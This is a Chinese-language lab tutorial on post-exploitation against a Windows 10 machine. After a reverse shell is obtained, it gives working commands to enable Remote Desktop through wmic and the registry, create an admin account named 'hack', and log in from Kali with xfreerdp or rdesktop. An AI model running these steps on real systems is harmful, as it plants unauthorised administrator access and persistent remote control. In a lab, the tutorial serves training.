一、准备工作
kali机:192.168.19.130
win10:192.168.19.133
主机:192.168.1.73(自己操作可以在kali上,我这是因为反弹的shell在主机上)
二、开启远程登录
1.win10上关闭实时保护,并且运行了反弹shell的脚本(关于如何反弹shell下次再写一篇文章,这里主要讲拿到shell后如何远程登录)
2.主机上进行监听拿到shell
3.查看远程登录3389端口是否打开
netstat -an
这边发现没有打开
4.windows打开3389远程连接的命令有两种办法(前提是自己拿到的shell是管理员权限)
(1)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
(2)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.再次查看3389是否打开(对于有些系统命令端就是打开不了远程连接,那就要在设置里手动打开了)
也可用netstat -an|find "3389"查看端口是否打开,不过有时候不回显,我的就是
6.确认远程连接端口是不是3389(因为有些人会将远程连接的端口更改)
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
0xd3d转换成十进制就是3389
三、创建用于登录的用户(前提当前用户是管理员)
1.Windows创建用户命令
net user hack 123456 /add
2.将用户添加进管理员组命令
net localgroup administrators hack /add
3.查看用户
net user
四、kali远程登录
1.xfreerdp工具
/u就是用户名,/p是密码,/v是靶机(目标)的地址/size就是图形化界面的大小
xfreerdp /u:hack /p:123456 /v:192.168.19.133 /size:80%
输入Y
然后就是连上了
2.rdesktop 工具
rdesktop 192.168.19.133
输入yes
五、中断连接
1.查看rdesktop或xfreerdp的进程
ps aux | grep rdesktop
2.中断进程
kill -9 进程号